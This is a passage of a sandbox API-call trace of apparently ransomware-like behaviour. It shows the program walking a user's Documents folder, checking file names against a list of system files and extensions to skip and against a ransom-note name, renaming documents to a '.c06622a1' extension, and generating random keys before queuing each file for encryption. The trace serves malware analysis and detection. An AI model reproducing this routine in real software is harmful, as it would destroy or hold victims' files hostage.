[0157.711] RtlComputeCrc32 (PartialCrc=0xffc7, Buffer=0x32ec24, Length=0x80) returned 0xb613ebce [0157.711] CloseHandle (hObject=0x1a0) returned 1 [0157.711] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.711] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx" [0157.711] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx") returned 0x35 [0157.711] wcscpy (in: _Dest=0x32200ba, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.711] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwkv.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwkv.docx.c06622a1"), dwFlags=0x8) returned 1 [0157.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWKv.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwkv.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0157.714] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.714] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0157.720] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x697528ca [0157.720] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7319b07d [0157.720] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb0108a8 [0157.721] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x48c15b41 [0157.721] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5649b978 [0157.721] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59a6a988 [0157.721] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x52446eae [0157.721] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xaf66b77 [0157.724] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0x62bc4cc3 [0157.724] RtlComputeCrc32 (PartialCrc=0x4cc3, Buffer=0x3630094, Length=0x80) returned 0x50ba2141 [0157.724] RtlComputeCrc32 (PartialCrc=0x2141, Buffer=0x3630094, Length=0x80) returned 0xc9308cc [0157.724] RtlComputeCrc32 (PartialCrc=0x8cc, Buffer=0x3630094, Length=0x80) returned 0x3afe7f41 [0157.724] RtlComputeCrc32 (PartialCrc=0x7f41, Buffer=0x3630094, Length=0x80) returned 0xdb134821 [0157.724] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0157.724] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.725] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.726] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f73bd0, ftCreationTime.dwHighDateTime=0x1d5ba18, ftLastAccessTime.dwLowDateTime=0xb98ee450, ftLastAccessTime.dwHighDateTime=0x1d59566, ftLastWriteTime.dwLowDateTime=0xb98ee450, ftLastWriteTime.dwHighDateTime=0x1d59566, nFileSizeHigh=0x0, nFileSizeLow=0xb09c, dwReserved0=0x0, dwReserved1=0x0, cFileName="kefVaBjYmRdF1.pptx", cAlternateFileName="KEFVAB~1.PPT")) returned 1 [0157.726] _wcsicmp (_Str1="kefVaBjYmRdF1.pptx", _Str2="README.c06622a1.TXT") returned -7 [0157.726] wcsstr (_Str="kefVaBjYmRdF1.pptx", _SubStr="README") returned 0x0 [0157.726] _wcsicmp (_Str1="autorun.inf", _Str2="kefVaBjYmRdF1.pptx") returned -10 [0157.726] wcslen (_String="autorun.inf") returned 0xb [0157.726] _wcsicmp (_Str1="boot.ini", _Str2="kefVaBjYmRdF1.pptx") returned -9 [0157.726] wcslen (_String="boot.ini") returned 0x8 [0157.726] _wcsicmp (_Str1="bootfont.bin", _Str2="kefVaBjYmRdF1.pptx") returned -9 [0157.726] wcslen (_String="bootfont.bin") returned 0xc [0157.726] _wcsicmp (_Str1="bootsect.bak", _Str2="kefVaBjYmRdF1.pptx") returned -9 [0157.727] wcslen (_String="bootsect.bak") returned 0xc [0157.727] _wcsicmp (_Str1="desktop.ini", _Str2="kefVaBjYmRdF1.pptx") returned -7 [0157.727] wcslen (_String="desktop.ini") returned 0xb [0157.727] _wcsicmp (_Str1="iconcache.db", _Str2="kefVaBjYmRdF1.pptx") returned -2 [0157.727] wcslen (_String="iconcache.db") returned 0xc [0157.727] _wcsicmp (_Str1="ntldr", _Str2="kefVaBjYmRdF1.pptx") returned 3 [0157.727] wcslen (_String="ntldr") returned 0x5 [0157.727] _wcsicmp (_Str1="ntuser.dat", _Str2="kefVaBjYmRdF1.pptx") returned 3 [0157.727] wcslen (_String="ntuser.dat") returned 0xa [0157.727] _wcsicmp (_Str1="ntuser.dat.log", _Str2="kefVaBjYmRdF1.pptx") returned 3 [0157.727] wcslen (_String="ntuser.dat.log") returned 0xe [0157.727] _wcsicmp (_Str1="ntuser.ini", _Str2="kefVaBjYmRdF1.pptx") returned 3 [0157.727] wcslen (_String="ntuser.ini") returned 0xa [0157.727] _wcsicmp (_Str1="thumbs.db", _Str2="kefVaBjYmRdF1.pptx") returned 9 [0157.727] wcslen (_String="thumbs.db") returned 0x9 [0157.727] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0157.727] wcslen (_String="386") returned 0x3 [0157.727] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0157.727] wcslen (_String="adv") returned 0x3 [0157.727] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0157.727] wcslen (_String="ani") returned 0x3 [0157.727] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0157.727] wcslen (_String="bat") returned 0x3 [0157.727] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0157.727] wcslen (_String="bin") returned 0x3 [0157.727] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0157.727] wcslen (_String="cab") returned 0x3 [0157.727] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0157.727] wcslen (_String="cmd") returned 0x3 [0157.727] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0157.727] wcslen (_String="com") returned 0x3 [0157.727] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0157.727] wcslen (_String="cpl") returned 0x3 [0157.727] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0157.728] wcslen (_String="cur") returned 0x3 [0157.728] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0157.728] wcslen (_String="deskthemepack") returned 0xd [0157.728] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0157.728] wcslen (_String="diagcab") returned 0x7 [0157.728] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0157.728] wcslen (_String="diagcfg") returned 0x7 [0157.728] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0157.728] wcslen (_String="diagpkg") returned 0x7 [0157.728] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0157.728] wcslen (_String="dll") returned 0x3 [0157.728] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0157.728] wcslen (_String="drv") returned 0x3 [0157.728] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0157.728] wcslen (_String="exe") returned 0x3 [0157.728] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0157.728] wcslen (_String="hlp") returned 0x3 [0157.728] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0157.728] wcslen (_String="icl") returned 0x3 [0157.728] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0157.728] wcslen (_String="icns") returned 0x4 [0157.728] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0157.728] wcslen (_String="ico") returned 0x3 [0157.728] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0157.728] wcslen (_String="ics") returned 0x3 [0157.728] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0157.728] wcslen (_String="idx") returned 0x3 [0157.728] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0157.728] wcslen (_String="ldf") returned 0x3 [0157.729] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0157.729] wcslen (_String="lnk") returned 0x3 [0157.729] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0157.729] wcslen (_String="mod") returned 0x3 [0157.729] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0157.729] wcslen (_String="mpa") returned 0x3 [0157.729] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0157.729] wcslen (_String="msc") returned 0x3 [0157.729] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0157.729] wcslen (_String="msp") returned 0x3 [0157.729] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0157.729] wcslen (_String="msstyles") returned 0x8 [0157.729] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0157.729] wcslen (_String="msu") returned 0x3 [0157.729] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0157.729] wcslen (_String="nls") returned 0x3 [0157.729] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0157.729] wcslen (_String="nomedia") returned 0x7 [0157.729] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0157.729] wcslen (_String="ocx") returned 0x3 [0157.729] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0157.729] wcslen (_String="prf") returned 0x3 [0157.729] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0157.729] wcslen (_String="ps1") returned 0x3 [0157.729] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0157.729] wcslen (_String="rom") returned 0x3 [0157.729] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0157.729] wcslen (_String="rtp") returned 0x3 [0157.729] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0157.729] wcslen (_String="scr") returned 0x3 [0157.729] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0157.730] wcslen (_String="shs") returned 0x3 [0157.730] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0157.730] wcslen (_String="spl") returned 0x3 [0157.730] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0157.730] wcslen (_String="sys") returned 0x3 [0157.730] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0157.730] wcslen (_String="theme") returned 0x5 [0157.730] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0157.730] wcslen (_String="themepack") returned 0x9 [0157.730] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0157.730] wcslen (_String="wpx") returned 0x3 [0157.730] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0157.730] wcslen (_String="lock") returned 0x4 [0157.730] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0157.730] wcslen (_String="key") returned 0x3 [0157.730] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0157.730] wcslen (_String="hta") returned 0x3 [0157.730] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0157.730] wcslen (_String="msi") returned 0x3 [0157.730] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0157.730] wcslen (_String="pdb") returned 0x3 [0157.730] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0157.730] wcslen (_String="sqlite") returned 0x6 [0157.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.730] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.730] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.730] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.730] wcscpy (in: _Dest=0x32100a0, _Source="kefVaBjYmRdF1.pptx" | out: _Dest="kefVaBjYmRdF1.pptx") returned="kefVaBjYmRdF1.pptx" [0157.731] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx", dwFileAttributes=0x80) returned 1 [0157.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kefvabjymrdf1.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0157.731] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.731] ReadFile (in: hFile=0x1d8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.732] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xf5c834c9 [0157.732] RtlComputeCrc32 (PartialCrc=0x34c9, Buffer=0x32ec24, Length=0x80) returned 0x13ecbade [0157.732] RtlComputeCrc32 (PartialCrc=0xbade, Buffer=0x32ec24, Length=0x80) returned 0x4eaa88bb [0157.732] RtlComputeCrc32 (PartialCrc=0x88bb, Buffer=0x32ec24, Length=0x80) returned 0xc2bb750c [0157.732] RtlComputeCrc32 (PartialCrc=0x750c, Buffer=0x32ec24, Length=0x80) returned 0x5f14deed [0157.732] CloseHandle (hObject=0x1d8) returned 1 [0157.732] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.732] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx" [0157.732] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx") returned 0x3e [0157.732] wcscpy (in: _Dest=0x32200cc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.732] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kefvabjymrdf1.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kefvabjymrdf1.pptx.c06622a1"), dwFlags=0x8) returned 1 [0157.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kefVaBjYmRdF1.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kefvabjymrdf1.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d8 [0157.735] CreateIoCompletionPort (FileHandle=0x1d8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.735] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1b1443b7 [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b74b138 [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x61368a07 [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2589f6f9 [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x69d7693b [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x354ec0b6 [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27f2097 [0157.742] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a476614 [0157.745] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0xddc057a3 [0157.745] RtlComputeCrc32 (PartialCrc=0x57a3, Buffer=0x36c0094, Length=0x80) returned 0x6a4228e9 [0157.745] RtlComputeCrc32 (PartialCrc=0x28e9, Buffer=0x36c0094, Length=0x80) returned 0x4ddeab6b [0157.745] RtlComputeCrc32 (PartialCrc=0xab6b, Buffer=0x36c0094, Length=0x80) returned 0x8d1cff36 [0157.745] RtlComputeCrc32 (PartialCrc=0xff36, Buffer=0x36c0094, Length=0x80) returned 0x14dd126d [0157.745] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0157.746] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.747] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.747] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x318a5ad0, ftCreationTime.dwHighDateTime=0x1d5b75d, ftLastAccessTime.dwLowDateTime=0x93a68d00, ftLastAccessTime.dwHighDateTime=0x1d5d865, ftLastWriteTime.dwLowDateTime=0x93a68d00, ftLastWriteTime.dwHighDateTime=0x1d5d865, nFileSizeHigh=0x0, nFileSizeLow=0xb419, dwReserved0=0x0, dwReserved1=0x0, cFileName="mKe0mxpFf7kQlueY.pptx", cAlternateFileName="MKE0MX~1.PPT")) returned 1 [0157.748] _wcsicmp (_Str1="mKe0mxpFf7kQlueY.pptx", _Str2="README.c06622a1.TXT") returned -5 [0157.748] wcsstr (_Str="mKe0mxpFf7kQlueY.pptx", _SubStr="README") returned 0x0 [0157.748] _wcsicmp (_Str1="autorun.inf", _Str2="mKe0mxpFf7kQlueY.pptx") returned -12 [0157.748] wcslen (_String="autorun.inf") returned 0xb [0157.748] _wcsicmp (_Str1="boot.ini", _Str2="mKe0mxpFf7kQlueY.pptx") returned -11 [0157.748] wcslen (_String="boot.ini") returned 0x8 [0157.748] _wcsicmp (_Str1="bootfont.bin", _Str2="mKe0mxpFf7kQlueY.pptx") returned -11 [0157.748] wcslen (_String="bootfont.bin") returned 0xc [0157.748] _wcsicmp (_Str1="bootsect.bak", _Str2="mKe0mxpFf7kQlueY.pptx") returned -11 [0157.748] wcslen (_String="bootsect.bak") returned 0xc [0157.748] _wcsicmp (_Str1="desktop.ini", _Str2="mKe0mxpFf7kQlueY.pptx") returned -9 [0157.748] wcslen (_String="desktop.ini") returned 0xb [0157.748] _wcsicmp (_Str1="iconcache.db", _Str2="mKe0mxpFf7kQlueY.pptx") returned -4 [0157.748] wcslen (_String="iconcache.db") returned 0xc [0157.748] _wcsicmp (_Str1="ntldr", _Str2="mKe0mxpFf7kQlueY.pptx") returned 1 [0157.748] wcslen (_String="ntldr") returned 0x5 [0157.748] _wcsicmp (_Str1="ntuser.dat", _Str2="mKe0mxpFf7kQlueY.pptx") returned 1 [0157.748] wcslen (_String="ntuser.dat") returned 0xa [0157.748] _wcsicmp (_Str1="ntuser.dat.log", _Str2="mKe0mxpFf7kQlueY.pptx") returned 1 [0157.748] wcslen (_String="ntuser.dat.log") returned 0xe [0157.748] _wcsicmp (_Str1="ntuser.ini", _Str2="mKe0mxpFf7kQlueY.pptx") returned 1 [0157.748] wcslen (_String="ntuser.ini") returned 0xa [0157.748] _wcsicmp (_Str1="thumbs.db", _Str2="mKe0mxpFf7kQlueY.pptx") returned 7 [0157.748] wcslen (_String="thumbs.db") returned 0x9 [0157.748] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0157.748] wcslen (_String="386") returned 0x3 [0157.748] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0157.748] wcslen (_String="adv") returned 0x3 [0157.748] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0157.748] wcslen (_String="ani") returned 0x3 [0157.748] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0157.748] wcslen (_String="bat") returned 0x3 [0157.748] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0157.748] wcslen (_String="bin") returned 0x3 [0157.749] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0157.749] wcslen (_String="cab") returned 0x3 [0157.749] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0157.749] wcslen (_String="cmd") returned 0x3 [0157.749] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0157.749] wcslen (_String="com") returned 0x3 [0157.749] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0157.749] wcslen (_String="cpl") returned 0x3 [0157.749] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0157.749] wcslen (_String="cur") returned 0x3 [0157.749] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0157.749] wcslen (_String="deskthemepack") returned 0xd [0157.749] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0157.749] wcslen (_String="diagcab") returned 0x7 [0157.749] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0157.749] wcslen (_String="diagcfg") returned 0x7 [0157.749] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0157.749] wcslen (_String="diagpkg") returned 0x7 [0157.749] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0157.749] wcslen (_String="dll") returned 0x3 [0157.749] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0157.749] wcslen (_String="drv") returned 0x3 [0157.749] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0157.749] wcslen (_String="exe") returned 0x3 [0157.749] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0157.749] wcslen (_String="hlp") returned 0x3 [0157.749] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0157.749] wcslen (_String="icl") returned 0x3 [0157.749] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0157.749] wcslen (_String="icns") returned 0x4 [0157.749] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0157.749] wcslen (_String="ico") returned 0x3 [0157.749] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0157.749] wcslen (_String="ics") returned 0x3 [0157.749] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0157.749] wcslen (_String="idx") returned 0x3 [0157.750] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0157.750] wcslen (_String="ldf") returned 0x3 [0157.750] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0157.750] wcslen (_String="lnk") returned 0x3 [0157.750] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0157.750] wcslen (_String="mod") returned 0x3 [0157.750] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0157.750] wcslen (_String="mpa") returned 0x3 [0157.750] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0157.750] wcslen (_String="msc") returned 0x3 [0157.750] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0157.750] wcslen (_String="msp") returned 0x3 [0157.750] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0157.750] wcslen (_String="msstyles") returned 0x8 [0157.750] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0157.750] wcslen (_String="msu") returned 0x3 [0157.750] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0157.750] wcslen (_String="nls") returned 0x3 [0157.750] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0157.750] wcslen (_String="nomedia") returned 0x7 [0157.750] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0157.750] wcslen (_String="ocx") returned 0x3 [0157.750] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0157.750] wcslen (_String="prf") returned 0x3 [0157.750] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0157.750] wcslen (_String="ps1") returned 0x3 [0157.750] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0157.750] wcslen (_String="rom") returned 0x3 [0157.750] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0157.750] wcslen (_String="rtp") returned 0x3 [0157.750] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0157.750] wcslen (_String="scr") returned 0x3 [0157.750] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0157.750] wcslen (_String="shs") returned 0x3 [0157.750] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0157.750] wcslen (_String="spl") returned 0x3 [0157.751] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0157.751] wcslen (_String="sys") returned 0x3 [0157.751] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0157.751] wcslen (_String="theme") returned 0x5 [0157.751] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0157.751] wcslen (_String="themepack") returned 0x9 [0157.751] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0157.751] wcslen (_String="wpx") returned 0x3 [0157.751] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0157.751] wcslen (_String="lock") returned 0x4 [0157.751] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0157.751] wcslen (_String="key") returned 0x3 [0157.751] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0157.751] wcslen (_String="hta") returned 0x3 [0157.751] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0157.751] wcslen (_String="msi") returned 0x3 [0157.751] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0157.751] wcslen (_String="pdb") returned 0x3 [0157.751] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0157.751] wcslen (_String="sqlite") returned 0x6 [0157.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.751] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.751] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.751] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.751] wcscpy (in: _Dest=0x32100a0, _Source="mKe0mxpFf7kQlueY.pptx" | out: _Dest="mKe0mxpFf7kQlueY.pptx") returned="mKe0mxpFf7kQlueY.pptx" [0157.751] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx", dwFileAttributes=0x80) returned 1 [0157.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mke0mxpff7kqluey.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 